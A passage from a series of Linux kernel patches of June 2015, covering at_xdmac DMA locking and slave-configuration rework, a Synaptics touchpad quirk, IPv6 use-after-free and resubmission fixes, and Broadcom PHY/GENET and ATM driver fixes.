spin_unlock; } dev_dbg(chan2dev(chan), "%s: * sg%d len=%u, mem=0x%08x\n", __func__, i, len, mem); @@ -600,8 +602,7 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, dev_err(chan2dev(chan), "can't get descriptor\n"); if (first) list_splice_init(&first->descs_list, &atchan->free_descs_list); - spin_unlock_bh(&atchan->lock); - return NULL; + goto spin_unlock; } /* Linked list descriptor setup. 
*/ @@ -645,13 +646,15 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, xfer_size += len; } - spin_unlock_bh(&atchan->lock); first->tx_dma_desc.flags = flags; first->xfer_size = xfer_size; first->direction = direction; + ret = &first->tx_dma_desc; - return &first->tx_dma_desc; +spin_unlock: + spin_unlock_irqrestore(&atchan->lock, irqflags); + return ret; } static struct dma_async_tx_descriptor * @@ -664,6 +667,7 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, struct at_xdmac_desc *first = NULL, *prev = NULL; unsigned int periods = buf_len / period_len; int i; + unsigned long irqflags; dev_dbg(chan2dev(chan), "%s: buf_addr=%pad, buf_len=%zd, period_len=%zd, dir=%s, flags=0x%lx\n", __func__, &buf_addr, buf_len, period_len, @@ -682,16 +686,16 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, for (i = 0; i < periods; i++) { struct at_xdmac_desc *desc = NULL; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); desc = at_xdmac_get_desc(atchan); if (!desc) { dev_err(chan2dev(chan), "can't get descriptor\n"); if (first) list_splice_init(&first->descs_list, &atchan->free_descs_list); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); return NULL; } - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); dev_dbg(chan2dev(chan), "%s: desc=0x%p, tx_dma_desc.phys=%pad\n", __func__, desc, &desc->tx_dma_desc.phys); @@ -766,6 +770,7 @@ at_xdmac_prep_dma_memcpy(struct dma_chan *chan, dma_addr_t dest, dma_addr_t src, | AT_XDMAC_CC_SIF(0) | AT_XDMAC_CC_MBSIZE_SIXTEEN | AT_XDMAC_CC_TYPE_MEM_TRAN; + unsigned long irqflags; dev_dbg(chan2dev(chan), "%s: src=%pad, dest=%pad, len=%zd, flags=0x%lx\n", __func__, &src, &dest, len, flags); @@ -798,9 +803,9 @@ at_xdmac_prep_dma_memcpy(struct dma_chan *chan, dma_addr_t dest, dma_addr_t src, dev_dbg(chan2dev(chan), "%s: remaining_size=%zu\n", __func__, remaining_size); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, irqflags); desc = at_xdmac_get_desc(atchan); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, irqflags); if (!desc) { dev_err(chan2dev(chan), "can't get descriptor\n"); if (first) @@ -886,6 +891,7 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, int residue; u32 cur_nda, mask, value; u8 dwidth = 0; + unsigned long flags; ret = dma_cookie_status(chan, cookie, txstate); if (ret == DMA_COMPLETE) @@ -894,7 +900,7 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, if (!txstate) return ret; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); desc = list_first_entry(&atchan->xfers_list, struct at_xdmac_desc, xfer_node); @@ -904,8 +910,7 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, */ if (!desc->active_xfer) { dma_set_residue(txstate, desc->xfer_size); - spin_unlock_bh(&atchan->lock); - return ret; + goto spin_unlock; } residue = desc->xfer_size; @@ -936,14 +941,14 @@ at_xdmac_tx_status(struct dma_chan *chan, dma_cookie_t cookie, } residue += at_xdmac_chan_read(atchan, AT_XDMAC_CUBC) << dwidth; - spin_unlock_bh(&atchan->lock); - dma_set_residue(txstate, residue); dev_dbg(chan2dev(chan), "%s: desc=0x%p, tx_dma_desc.phys=%pad, tx_status=%d, cookie=%d, residue=%d\n", __func__, desc, &desc->tx_dma_desc.phys, ret, cookie, residue); +spin_unlock: + spin_unlock_irqrestore(&atchan->lock, flags); return ret; } @@ -964,8 +969,9 @@ static void at_xdmac_remove_xfer(struct at_xdmac_chan *atchan, static void 
at_xdmac_advance_work(struct at_xdmac_chan *atchan) { struct at_xdmac_desc *desc; + unsigned long flags; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); /* * If channel is enabled, do nothing, advance_work will be triggered @@ -980,7 +986,7 @@ static void at_xdmac_advance_work(struct at_xdmac_chan *atchan) at_xdmac_start_xfer(atchan, desc); } - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); } static void at_xdmac_handle_cyclic(struct at_xdmac_chan *atchan) @@ -1116,12 +1122,13 @@ static int at_xdmac_device_config(struct dma_chan *chan, { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); int ret; + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); ret = at_xdmac_set_slave_config(chan, config); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return ret; } @@ -1130,18 +1137,19 @@ static int at_xdmac_device_pause(struct dma_chan *chan) { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac *atxdmac = to_at_xdmac(atchan->chan.device); + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); if (test_and_set_bit(AT_XDMAC_CHAN_IS_PAUSED, &atchan->status)) return 0; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); at_xdmac_write(atxdmac, AT_XDMAC_GRWS, atchan->mask); while (at_xdmac_chan_read(atchan, AT_XDMAC_CC) & (AT_XDMAC_CC_WRIP | AT_XDMAC_CC_RDIP)) cpu_relax(); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } @@ -1150,18 +1158,19 @@ static int at_xdmac_device_resume(struct dma_chan *chan) { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac *atxdmac = to_at_xdmac(atchan->chan.device); + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); if (!at_xdmac_chan_is_paused(atchan)) { - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } at_xdmac_write(atxdmac, AT_XDMAC_GRWR, atchan->mask); clear_bit(AT_XDMAC_CHAN_IS_PAUSED, &atchan->status); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } @@ -1171,10 +1180,11 @@ static int at_xdmac_device_terminate_all(struct dma_chan *chan) struct at_xdmac_desc *desc, *_desc; struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac *atxdmac = to_at_xdmac(atchan->chan.device); + unsigned long flags; dev_dbg(chan2dev(chan), "%s\n", __func__); - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); at_xdmac_write(atxdmac, AT_XDMAC_GD, atchan->mask); while (at_xdmac_read(atxdmac, AT_XDMAC_GS) & atchan->mask) cpu_relax(); @@ -1184,7 +1194,7 @@ static int at_xdmac_device_terminate_all(struct dma_chan *chan) at_xdmac_remove_xfer(atchan, desc); clear_bit(AT_XDMAC_CHAN_IS_CYCLIC, &atchan->status); - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return 0; } @@ -1194,8 +1204,9 @@ static int at_xdmac_alloc_chan_resources(struct dma_chan *chan) struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); struct at_xdmac_desc *desc; int i; + unsigned long flags; - spin_lock_bh(&atchan->lock); + spin_lock_irqsave(&atchan->lock, flags); if (at_xdmac_chan_is_enabled(atchan)) { dev_err(chan2dev(chan), @@ -1226,7 +1237,7 @@ static int at_xdmac_alloc_chan_resources(struct dma_chan *chan) dev_dbg(chan2dev(chan), "%s: allocated %d descriptors\n", __func__, i); 
spin_unlock: - spin_unlock_bh(&atchan->lock); + spin_unlock_irqrestore(&atchan->lock, flags); return i; } From 765c37d876698268eea8b820081ac8fc9d0fc8bc Mon Sep 17 00:00:00 2001 From: Ludovic Desroches Date: Mon, 8 Jun 2015 10:33:15 +0200 Subject: [PATCH 777/872] dmaengine: at_xdmac: rework slave configuration part Rework slave configuration part in order to more report wrong errors about the configuration. Only maxburst and addr width values are checked when doing the slave configuration. The validity of the channel configuration is done at prepare time. Signed-off-by: Ludovic Desroches Cc: stable@vger.kernel.org # 4.0 and later Signed-off-by: Vinod Koul --- drivers/dma/at_xdmac.c | 156 +++++++++++++++++++++++++---------------- 1 file changed, 96 insertions(+), 60 deletions(-) diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c index 0dcc9a7a90af..7992164ea9ec 100644 --- a/drivers/dma/at_xdmac.c +++ b/drivers/dma/at_xdmac.c @@ -174,6 +174,8 @@ #define AT_XDMAC_MBR_UBC_NDV3 (0x3 << 27) /* Next Descriptor View 3 */ #define AT_XDMAC_MAX_CHAN 0x20 +#define AT_XDMAC_MAX_CSIZE 16 /* 16 data */ +#define AT_XDMAC_MAX_DWIDTH 8 /* 64 bits */ #define AT_XDMAC_DMA_BUSWIDTHS\ (BIT(DMA_SLAVE_BUSWIDTH_UNDEFINED) |\ @@ -192,20 +194,17 @@ struct at_xdmac_chan { struct dma_chan chan; void __iomem *ch_regs; u32 mask; /* Channel Mask */ - u32 cfg[2]; /* Channel Configuration Register */ - #define AT_XDMAC_DEV_TO_MEM_CFG 0 /* Predifined dev to mem channel conf */ - #define AT_XDMAC_MEM_TO_DEV_CFG 1 /* Predifined mem to dev channel conf */ + u32 cfg; /* Channel Configuration Register */ u8 perid; /* Peripheral ID */ u8 perif; /* Peripheral Interface */ u8 memif; /* Memory Interface */ - u32 per_src_addr; - u32 per_dst_addr; u32 save_cc; u32 save_cim; u32 save_cnda; u32 save_cndc; unsigned long status; struct tasklet_struct tasklet; + struct dma_slave_config sconfig; spinlock_t lock; @@ -495,61 +494,94 @@ static struct dma_chan *at_xdmac_xlate(struct of_phandle_args *dma_spec, return chan; } +static int at_xdmac_compute_chan_conf(struct dma_chan *chan, + enum dma_transfer_direction direction) +{ + struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); + int csize, dwidth; + + if (direction == DMA_DEV_TO_MEM) { + atchan->cfg = + AT91_XDMAC_DT_PERID(atchan->perid) + | AT_XDMAC_CC_DAM_INCREMENTED_AM + | AT_XDMAC_CC_SAM_FIXED_AM + | AT_XDMAC_CC_DIF(atchan->memif) + | AT_XDMAC_CC_SIF(atchan->perif) + | AT_XDMAC_CC_SWREQ_HWR_CONNECTED + | AT_XDMAC_CC_DSYNC_PER2MEM + | AT_XDMAC_CC_MBSIZE_SIXTEEN + | AT_XDMAC_CC_TYPE_PER_TRAN; + csize = ffs(atchan->sconfig.src_maxburst) - 1; + if (csize < 0) { + dev_err(chan2dev(chan), "invalid src maxburst value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_CSIZE(csize); + dwidth = ffs(atchan->sconfig.src_addr_width) - 1; + if (dwidth < 0) { + dev_err(chan2dev(chan), "invalid src addr width value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_DWIDTH(dwidth); + } else if (direction == DMA_MEM_TO_DEV) { + atchan->cfg = + AT91_XDMAC_DT_PERID(atchan->perid) + | AT_XDMAC_CC_DAM_FIXED_AM + | AT_XDMAC_CC_SAM_INCREMENTED_AM + | AT_XDMAC_CC_DIF(atchan->perif) + | AT_XDMAC_CC_SIF(atchan->memif) + | AT_XDMAC_CC_SWREQ_HWR_CONNECTED + | AT_XDMAC_CC_DSYNC_MEM2PER + | AT_XDMAC_CC_MBSIZE_SIXTEEN + | AT_XDMAC_CC_TYPE_PER_TRAN; + csize = ffs(atchan->sconfig.dst_maxburst) - 1; + if (csize < 0) { + dev_err(chan2dev(chan), "invalid src maxburst value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_CSIZE(csize); + dwidth = ffs(atchan->sconfig.dst_addr_width) - 1; + if 
(dwidth < 0) { + dev_err(chan2dev(chan), "invalid dst addr width value\n"); + return -EINVAL; + } + atchan->cfg |= AT_XDMAC_CC_DWIDTH(dwidth); + } + + dev_dbg(chan2dev(chan), "%s: cfg=0x%08x\n", __func__, atchan->cfg); + + return 0; +} + +/* + * Only check that maxburst and addr width values are supported by the + * the controller but not that the configuration is good to perform the + * transfer since we don't know the direction at this stage. + */ +static int at_xdmac_check_slave_config(struct dma_slave_config *sconfig) +{ + if ((sconfig->src_maxburst > AT_XDMAC_MAX_CSIZE) + || (sconfig->dst_maxburst > AT_XDMAC_MAX_CSIZE)) + return -EINVAL; + + if ((sconfig->src_addr_width > AT_XDMAC_MAX_DWIDTH) + || (sconfig->dst_addr_width > AT_XDMAC_MAX_DWIDTH)) + return -EINVAL; + + return 0; +} + static int at_xdmac_set_slave_config(struct dma_chan *chan, struct dma_slave_config *sconfig) { struct at_xdmac_chan *atchan = to_at_xdmac_chan(chan); - u8 dwidth; - int csize; - atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG] = - AT91_XDMAC_DT_PERID(atchan->perid) - | AT_XDMAC_CC_DAM_INCREMENTED_AM - | AT_XDMAC_CC_SAM_FIXED_AM - | AT_XDMAC_CC_DIF(atchan->memif) - | AT_XDMAC_CC_SIF(atchan->perif) - | AT_XDMAC_CC_SWREQ_HWR_CONNECTED - | AT_XDMAC_CC_DSYNC_PER2MEM - | AT_XDMAC_CC_MBSIZE_SIXTEEN - | AT_XDMAC_CC_TYPE_PER_TRAN; - csize = at_xdmac_csize(sconfig->src_maxburst); - if (csize < 0) { - dev_err(chan2dev(chan), "invalid src maxburst value\n"); + if (at_xdmac_check_slave_config(sconfig)) { + dev_err(chan2dev(chan), "invalid slave configuration\n"); return -EINVAL; } - atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG] |= AT_XDMAC_CC_CSIZE(csize); - dwidth = ffs(sconfig->src_addr_width) - 1; - atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG] |= AT_XDMAC_CC_DWIDTH(dwidth); - - - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG] = - AT91_XDMAC_DT_PERID(atchan->perid) - | AT_XDMAC_CC_DAM_FIXED_AM - | AT_XDMAC_CC_SAM_INCREMENTED_AM - | AT_XDMAC_CC_DIF(atchan->perif) - | AT_XDMAC_CC_SIF(atchan->memif) - | AT_XDMAC_CC_SWREQ_HWR_CONNECTED - | AT_XDMAC_CC_DSYNC_MEM2PER - | AT_XDMAC_CC_MBSIZE_SIXTEEN - | AT_XDMAC_CC_TYPE_PER_TRAN; - csize = at_xdmac_csize(sconfig->dst_maxburst); - if (csize < 0) { - dev_err(chan2dev(chan), "invalid src maxburst value\n"); - return -EINVAL; - } - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG] |= AT_XDMAC_CC_CSIZE(csize); - dwidth = ffs(sconfig->dst_addr_width) - 1; - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG] |= AT_XDMAC_CC_DWIDTH(dwidth); - - /* Src and dst addr are needed to configure the link list descriptor. */ - atchan->per_src_addr = sconfig->src_addr; - atchan->per_dst_addr = sconfig->dst_addr; - dev_dbg(chan2dev(chan), - "%s: cfg[dev2mem]=0x%08x, cfg[mem2dev]=0x%08x, per_src_addr=0x%08x, per_dst_addr=0x%08x\n", - __func__, atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG], - atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG], - atchan->per_src_addr, atchan->per_dst_addr); + memcpy(&atchan->sconfig, sconfig, sizeof(atchan->sconfig)); return 0; } @@ -583,6 +615,9 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, /* Protect dma_sconfig field that can be modified by set_slave_conf. */ spin_lock_irqsave(&atchan->lock, irqflags); + if (at_xdmac_compute_chan_conf(chan, direction)) + goto spin_unlock; + /* Prepare descriptors. */ for_each_sg(sgl, sg, sg_len, i) { struct at_xdmac_desc *desc = NULL; @@ -607,14 +642,13 @@ at_xdmac_prep_slave_sg(struct dma_chan *chan, struct scatterlist *sgl, /* Linked list descriptor setup. 
*/ if (direction == DMA_DEV_TO_MEM) { - desc->lld.mbr_sa = atchan->per_src_addr; + desc->lld.mbr_sa = atchan->sconfig.src_addr; desc->lld.mbr_da = mem; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG]; } else { desc->lld.mbr_sa = mem; - desc->lld.mbr_da = atchan->per_dst_addr; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG]; + desc->lld.mbr_da = atchan->sconfig.dst_addr; } + desc->lld.mbr_cfg = atchan->cfg; dwidth = at_xdmac_get_dwidth(desc->lld.mbr_cfg); fixed_dwidth = IS_ALIGNED(len, 1 << dwidth) ? at_xdmac_get_dwidth(desc->lld.mbr_cfg) @@ -683,6 +717,9 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, return NULL; } + if (at_xdmac_compute_chan_conf(chan, direction)) + return NULL; + for (i = 0; i < periods; i++) { struct at_xdmac_desc *desc = NULL; @@ -701,14 +738,13 @@ at_xdmac_prep_dma_cyclic(struct dma_chan *chan, dma_addr_t buf_addr, __func__, desc, &desc->tx_dma_desc.phys); if (direction == DMA_DEV_TO_MEM) { - desc->lld.mbr_sa = atchan->per_src_addr; + desc->lld.mbr_sa = atchan->sconfig.src_addr; desc->lld.mbr_da = buf_addr + i * period_len; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_DEV_TO_MEM_CFG]; } else { desc->lld.mbr_sa = buf_addr + i * period_len; - desc->lld.mbr_da = atchan->per_dst_addr; - desc->lld.mbr_cfg = atchan->cfg[AT_XDMAC_MEM_TO_DEV_CFG]; + desc->lld.mbr_da = atchan->sconfig.dst_addr; } + desc->lld.mbr_cfg = atchan->cfg; desc->lld.mbr_ubc = AT_XDMAC_MBR_UBC_NDV1 | AT_XDMAC_MBR_UBC_NDEN | AT_XDMAC_MBR_UBC_NSEN From 7f2ca8b55aeff1fe51ed3570200ef88a96060917 Mon Sep 17 00:00:00 2001 From: Peter Hutterer Date: Mon, 8 Jun 2015 10:17:32 -0700 Subject: [PATCH 778/872] Input: synaptics - add min/max quirk for Lenovo S540 https://bugzilla.redhat.com/show_bug.cgi?id=1223051#c2 Cc: stable@vger.kernel.org Tested-by: tommy.gagnes@gmail.com Signed-off-by: Peter Hutterer Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/synaptics.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c index 630af73e98c4..35c8d0ceabee 100644 --- a/drivers/input/mouse/synaptics.c +++ b/drivers/input/mouse/synaptics.c @@ -150,6 +150,11 @@ static const struct min_max_quirk min_max_pnpid_table[] = { {ANY_BOARD_ID, 2961}, 1024, 5112, 2024, 4832 }, + { + (const char * const []){"LEN2000", NULL}, + {ANY_BOARD_ID, ANY_BOARD_ID}, + 1024, 5113, 2021, 4832 + }, { (const char * const []){"LEN2001", NULL}, {ANY_BOARD_ID, ANY_BOARD_ID}, @@ -191,7 +196,7 @@ static const char * const topbuttonpad_pnp_ids[] = { "LEN0045", "LEN0047", "LEN0049", - "LEN2000", + "LEN2000", /* S540 */ "LEN2001", /* Edge E431 */ "LEN2002", /* Edge E531 */ "LEN2003", From 27e41fcfa6b326ad44eee7e0b1930d080b270895 Mon Sep 17 00:00:00 2001 From: Robert Shearman Date: Fri, 5 Jun 2015 18:51:54 +0100 Subject: [PATCH 779/872] ipv6: fix possible use after free of dev stats The memory pointed to by idev->stats.icmpv6msgdev, idev->stats.icmpv6dev and idev->stats.ipv6 can each be used in an RCU read context without taking a reference on idev. For example, through IP6_*_STATS_* calls in ip6_rcv. These memory blocks are freed without waiting for an RCU grace period to elapse. This could lead to the memory being written to after it has been freed. Fix this by using call_rcu to free the memory used for stats, as well as idev after an RCU grace period has elapsed. Signed-off-by: Robert Shearman Acked-by: Hannes Frederic Sowa Signed-off-by: David S. 
Miller --- net/ipv6/addrconf_core.c | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/net/ipv6/addrconf_core.c b/net/ipv6/addrconf_core.c index d873ceea86e6..ca09bf49ac68 100644 --- a/net/ipv6/addrconf_core.c +++ b/net/ipv6/addrconf_core.c @@ -133,6 +133,14 @@ static void snmp6_free_dev(struct inet6_dev *idev) free_percpu(idev->stats.ipv6); } +static void in6_dev_finish_destroy_rcu(struct rcu_head *head) +{ + struct inet6_dev *idev = container_of(head, struct inet6_dev, rcu); + + snmp6_free_dev(idev); + kfree(idev); +} + /* Nobody refers to this device, we may destroy it. */ void in6_dev_finish_destroy(struct inet6_dev *idev) @@ -151,7 +159,6 @@ void in6_dev_finish_destroy(struct inet6_dev *idev) pr_warn("Freeing alive inet6 device %p\n", idev); return; } - snmp6_free_dev(idev); - kfree_rcu(idev, rcu); + call_rcu(&idev->rcu, in6_dev_finish_destroy_rcu); } EXPORT_SYMBOL(in6_dev_finish_destroy); From 0243508edd317ff1fa63b495643a7c192fbfcd92 Mon Sep 17 00:00:00 2001 From: Josh Hunt Date: Mon, 8 Jun 2015 12:00:59 -0400 Subject: [PATCH 780/872] ipv6: Fix protocol resubmission UDP encapsulation is broken on IPv6. This is because the logic to resubmit the nexthdr is inverted, checking for a ret value > 0 instead of < 0. Also, the resubmit label is in the wrong position since we already get the nexthdr value when performing decapsulation. In addition the skb pull is no longer necessary either. This changes the return value check to look for < 0, using it for the nexthdr on the next iteration, and moves the resubmit label to the proper location. With these changes the v6 code now matches what we do in the v4 ip input code wrt resubmitting when decapsulating. Signed-off-by: Josh Hunt Acked-by: "Tom Herbert" Signed-off-by: David S. Miller --- net/ipv6/ip6_input.c | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c index f2e464eba5ef..41a73da371a9 100644 --- a/net/ipv6/ip6_input.c +++ b/net/ipv6/ip6_input.c @@ -212,13 +212,13 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) */ rcu_read_lock(); -resubmit: idev = ip6_dst_idev(skb_dst(skb)); if (!pskb_pull(skb, skb_transport_offset(skb))) goto discard; nhoff = IP6CB(skb)->nhoff; nexthdr = skb_network_header(skb)[nhoff]; +resubmit: raw = raw6_local_deliver(skb, nexthdr); ipprot = rcu_dereference(inet6_protos[nexthdr]); if (ipprot) { @@ -246,10 +246,12 @@ static int ip6_input_finish(struct sock *sk, struct sk_buff *skb) goto discard; ret = ipprot->handler(skb); - if (ret > 0) + if (ret < 0) { + nexthdr = -ret; goto resubmit; - else if (ret == 0) + } else if (ret == 0) { IP6_INC_STATS_BH(net, idev, IPSTATS_MIB_INDELIVERS); + } } else { if (!raw) { if (xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) { From afe3f907d20f39c0eaf81f2baec247ba672f34a9 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Mon, 8 Jun 2015 10:47:57 -0700 Subject: [PATCH 781/872] net: bcmgenet: power on MII block for all MII modes The RGMII block is currently only powered on when using RGMII or RGMII_NO_ID, which is not correct when using the GENET interface in MII or Reverse MII modes. We always need to power on the RGMII interface for this block to properly work, regardless of the MII mode in which we operate. Fixes: aa09677cba423 ("net: bcmgenet: add MDIO routines") Signed-off-by: Florian Fainelli Signed-off-by: David S. 
Miller --- drivers/net/ethernet/broadcom/genet/bcmmii.c | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c index e7651b3c6c57..420949cc55aa 100644 --- a/drivers/net/ethernet/broadcom/genet/bcmmii.c +++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c @@ -299,9 +299,6 @@ int bcmgenet_mii_config(struct net_device *dev, bool init) phy_name = "external RGMII (no delay)"; else phy_name = "external RGMII (TX delay)"; - reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL); - reg |= RGMII_MODE_EN | id_mode_dis; - bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL); bcmgenet_sys_writel(priv, PORT_MODE_EXT_GPHY, SYS_PORT_CTRL); break; @@ -310,6 +307,15 @@ int bcmgenet_mii_config(struct net_device *dev, bool init) return -EINVAL; } + /* This is an external PHY (xMII), so we need to enable the RGMII + * block for the interface to work + */ + if (priv->ext_phy) { + reg = bcmgenet_ext_readl(priv, EXT_RGMII_OOB_CTRL); + reg |= RGMII_MODE_EN | id_mode_dis; + bcmgenet_ext_writel(priv, reg, EXT_RGMII_OOB_CTRL); + } + if (init) dev_info(kdev, "configuring instance for %s\n", phy_name); From bbbf2df0039d31c6a0a9708ce4fe220a54bd5379 Mon Sep 17 00:00:00 2001 From: Willem de Bruijn Date: Mon, 8 Jun 2015 11:53:08 -0400 Subject: [PATCH 782/872] net: replace last open coded skb_orphan_frags with function call Commit 70008aa50e92 ("skbuff: convert to skb_orphan_frags") replaced open coded tests of SKBTX_DEV_ZEROCOPY and skb_copy_ubufs with calls to helper function skb_orphan_frags. Apply that to the last remaining open coded site. Signed-off-by: Willem de Bruijn Acked-by: Michael S. Tsirkin Signed-off-by: David S. Miller --- net/core/dev.c | 11 ++--------- 1 file changed, 2 insertions(+), 9 deletions(-) diff --git a/net/core/dev.c b/net/core/dev.c index 2c1c67fad64d..aa82f9ab6a36 100644 --- a/net/core/dev.c +++ b/net/core/dev.c @@ -1718,15 +1718,8 @@ EXPORT_SYMBOL_GPL(is_skb_forwardable); int __dev_forward_skb(struct net_device *dev, struct sk_buff *skb) { - if (skb_shinfo(skb)->tx_flags & SKBTX_DEV_ZEROCOPY) { - if (skb_copy_ubufs(skb, GFP_ATOMIC)) { - atomic_long_inc(&dev->rx_dropped); - kfree_skb(skb); - return NET_RX_DROP; - } - } - - if (unlikely(!is_skb_forwardable(dev, skb))) { + if (skb_orphan_frags(skb, GFP_ATOMIC) || + unlikely(!is_skb_forwardable(dev, skb))) { atomic_long_inc(&dev->rx_dropped); kfree_skb(skb); return NET_RX_DROP; From 6da8253bdd3945b81377e4908d6d395a9956f8af Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Mon, 8 Jun 2015 11:05:20 -0700 Subject: [PATCH 783/872] net: phy: bcm7xxx: update workaround to fix 100BaseT corner cases Update the AFE_TX_CONFIG value to solve marginal rise/fall issues observed when the link is operating in 100BaseT. This workaround applies to GPHY revisions D0, E0 and newer. Signed-off-by: Florian Fainelli Signed-off-by: David S. 
Miller --- drivers/net/phy/bcm7xxx.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c index b5dc59de094e..4dea85bfc545 100644 --- a/drivers/net/phy/bcm7xxx.c +++ b/drivers/net/phy/bcm7xxx.c @@ -136,8 +136,8 @@ static int bcm7xxx_28nm_d0_afe_config_init(struct phy_device *phydev) /* AFE_RX_LP_COUNTER, set RX bandwidth to maximum */ phy_write_misc(phydev, AFE_RX_LP_COUNTER, 0x7fc0); - /* AFE_TX_CONFIG, set 1000BT Cfeed=110 for all ports */ - phy_write_misc(phydev, AFE_TX_CONFIG, 0x0061); + /* AFE_TX_CONFIG, set 100BT Cfeed=011 to improve rise/fall time */ + phy_write_misc(phydev, AFE_TX_CONFIG, 0x431); /* AFE_VDCA_ICTRL_0, set Iq=1101 instead of 0111 for AB symmetry */ phy_write_misc(phydev, AFE_VDCA_ICTRL_0, 0xa7da); @@ -167,6 +167,9 @@ static int bcm7xxx_28nm_e0_plus_afe_config_init(struct phy_device *phydev) /* AFE_RXCONFIG_1, provide more margin for INL/DNL measurement */ phy_write_misc(phydev, AFE_RXCONFIG_1, 0x9b2f); + /* AFE_TX_CONFIG, set 100BT Cfeed=011 to improve rise/fall time */ + phy_write_misc(phydev, AFE_TX_CONFIG, 0x431); + /* AFE_VDCA_ICTRL_0, set Iq=1101 instead of 0111 for AB symmetry */ phy_write_misc(phydev, AFE_VDCA_ICTRL_0, 0xa7da); From 684b4ac14f4306c877834a8daaf0f0665128eae4 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Mon, 8 Jun 2015 21:16:28 +0200 Subject: [PATCH 784/872] atm: use msecs_to_jiffies for conversions API compliance scanning with coccinelle flagged: ./drivers/atm/iphase.c:2621:4-20: WARNING: timeout (50) seems HZ dependent Numeric constants passed to schedule_timeout() make the effective timeout HZ dependent which does not seem intended. Fixed up by converting the constant to jiffies with msecs_to_jiffies() As this driver was introduced in the early 2.3 series it is most likely assuming HZ=100 so the constant 50 is converted to 500ms. Signed-off-by: Nicholas Mc Guire Signed-off-by: David S. Miller --- drivers/atm/iphase.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/atm/iphase.c b/drivers/atm/iphase.c index 924f8e26789d..65e65903faa0 100644 --- a/drivers/atm/iphase.c +++ b/drivers/atm/iphase.c @@ -2618,7 +2618,7 @@ static void ia_close(struct atm_vcc *vcc) if (vcc->qos.txtp.traffic_class != ATM_NONE) { iadev->close_pending++; 